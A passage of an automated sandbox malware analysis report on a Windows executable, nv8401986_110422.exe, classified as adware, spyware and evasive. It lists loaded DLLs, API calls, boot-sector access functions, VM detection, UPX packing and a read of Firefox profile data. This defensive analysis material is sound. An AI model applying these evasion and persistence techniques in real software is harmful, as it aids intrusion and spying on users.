        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00447AD00_2_00447AD0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004A3B400_2_004A3B40
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0053DE3F0_2_0053DE3F
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00417F400_2_00417F40
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00441F900_2_00441F90
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: String function: 0049C5E0 appears 124 times
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: String function: 0049D360 appears 36 times
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: String function: 00483970 appears 43 times
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: String function: 00471D90 appears 37 times
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: String function: 0043F340 appears 63 times
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: String function: 00514EE0 appears 36 times
        Source: nv8401986_110422.exe, 00000000.00000000.2014677397.00000000005A5000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSEMzf vs nv8401986_110422.exe
        Source: nv8401986_110422.exe, 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSEMzf vs nv8401986_110422.exe
        Source: nv8401986_110422.exeBinary or memory string: OriginalFilenameSEMzf vs nv8401986_110422.exe
        Source: nv8401986_110422.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: nv8401986_110422.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9907210500616777
        Source: classification engineClassification label: mal100.adwa.spyw.evad.winEXE@1/81@12/3
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00483970 GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,0_2_00483970
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00410800 GetProcAddress,GetProcAddress,GetProcAddress,SHGetPathFromIDListW,FindFirstFileW,CoInitialize,CoCreateInstance,_wcsrchr,_wcschr,CoUninitialize,FindNextFileW,FindClose,0_2_00410800
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0046A5B0 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,LoadCursorW,RegisterClassExW,GetModuleHandleW,CreateWindowExW,GetModuleHandleW,FindResourceW,GetModuleHandleW,SizeofResource,GetModuleHandleW,LoadResource,FreeResource,0_2_0046A5B0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile created: C:\Users\user\AppData\Roaming\GlobalMgr.dbJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMutant created: \Sessions\1\BaseNamedObjects\ATL:MemData03EAnv8401986_110422.exe
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile created: C:\Users\user\AppData\Local\Temp\~DF258EEC8E43A49788.TMPJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: nv8401986_110422.exeVirustotal: Detection: 87%
        Source: nv8401986_110422.exeReversingLabs: Detection: 86%
        Source: nv8401986_110422.exeString found in binary or memory: aow-install-apk-100.xml
        Source: nv8401986_110422.exeString found in binary or memory: aow-install-apk.xml
        Source: nv8401986_110422.exeString found in binary or memory: vdi-install-apk-100.xml
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile read: C:\Users\user\Desktop\nv8401986_110422.exeJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: d3d9.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: imgutil.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: profext.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: windowscodecsext.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: mscms.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: coloradapterclient.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: icm32.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile written: C:\ProgramData\roundinfo.iniJump to behavior
        Source: nv8401986_110422.exeStatic PE information: certificate valid
        Source: Binary string: #E:\654.pdb source: nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: Binary string: E:\654.pdb source: nv8401986_110422.exe, nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0046D180 LoadLibraryA,GetProcAddress,0_2_0046D180
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_005149D5 push ecx; ret 0_2_005149E8
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00514F26 push ecx; ret 0_2_00514F39
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0BEF699B push esi; ret 0_2_0BEF69A3
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0BEF7027 push esi; ret 0_2_0BEF702F
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0BEF4B3A push cs; iretd 0_2_0BEF4B4F
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0BF05A03 pushad ; retf 0_2_0BF05A09
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0C91F167 push esp; retf 0_2_0C91F175
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0CF068CD push ecx; retf 0_2_0CF068CE
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0D7E242C pushad ; retf 0_2_0D7E2430
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0D7E32D4 push eax; retf 0_2_0D7E32D5
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0EC826E6 push esi; ret 0_2_0EC826E8
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0EC82985 push esi; ret 0_2_0EC82987
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: DeviceIoControl,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_0048F380
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: CreateFileW,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d0_2_0048F7E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_0048F5E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00406230 GetProcAddress,GetProcAddress,PathFileExistsA,GetProcAddress,PathFileExistsA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,GetProcAddress,PathFileExistsA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetProcAddress,std::ios_base::_Ios_base_dtor,0_2_00406230
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004886E0 GetProcAddress,GetProcAddress,GetLocalTime,GetProcAddress,PathFileExistsA,SetFileAttributesA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,CreateFileA,CloseHandle,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,0_2_004886E0

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: DeviceIoControl,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_0048F380
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: CreateFileW,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d0_2_0048F7E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_0048F5E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004546A0 MessageBoxA,ShowWindow,ShowWindow,IsIconic,ShowWindow,0_2_004546A0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00445A50 KillTimer,KillTimer,KillTimer,MessageBoxA,KillTimer,KillTimer,KillTimer,PostMessageW,ShowWindow,ShowWindow,ShowWindow,IsIconic,ShowWindow,0_2_00445A50
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00449F60 GetWindowRect,GetWindowRect,IsIconic,SystemParametersInfoW,GetWindowRect,SystemParametersInfoW,SetWindowPos,0_2_00449F60
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00484290 GetModuleHandleW,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_wcsstr,_wcsstr,_wcsstr,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00484290
        Source: C:\Users\user\Desktop\nv8401986_110422.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Contains functionality to detect virtual machines (IN, VMware)
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BBD0 in eax, dx0_2_0048BBD0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 4670000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 5120000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 6670000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 6690000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 69A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 8F20000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: 8F60000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: A960000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: AB70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: AC90000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B470000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B5F0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B610000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B650000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B670000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B780000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B830000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B800000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B940000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B960000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B9A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: B9E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BA00000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BA60000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BAB0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BA80000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BAD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BAF0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB10000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB30000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB50000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB90000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BBB0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BDD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BDF0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE10000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE30000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE50000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE90000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BEB0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BED0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C0E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C100000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C120000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C140000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C3E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C400000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C560000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C5A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C720000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C740000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C760000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C780000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C800000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C860000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C010000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C050000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BF70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BF90000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BFD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C070000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C090000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C7A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C880000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C8A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C8C0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C8E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C920000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C940000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C980000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C9A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C9E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA00000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA40000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA60000 memory commit | memory reserve | memory write watchJump to behavior
